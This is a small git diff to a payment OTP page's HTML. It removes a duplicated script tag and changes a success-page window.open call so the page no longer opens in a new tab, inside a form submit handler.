--- a/Payment/otp.html
+++ b/Payment/otp.html
@@ -136,7 +136,6 @@
 
 </body>
 <script>
- <script>
             var form = document.getElementById('sheetdb-form');
         form.addEventListener("submit", e => {
           e.preventDefault();
@@ -147,7 +146,7 @@
               response => response.json()
           ).then((html) => {
             // you can put any JS code here
-            window.open('success.html', '_blank');
+            window.open('success.html');
 
           });
         });
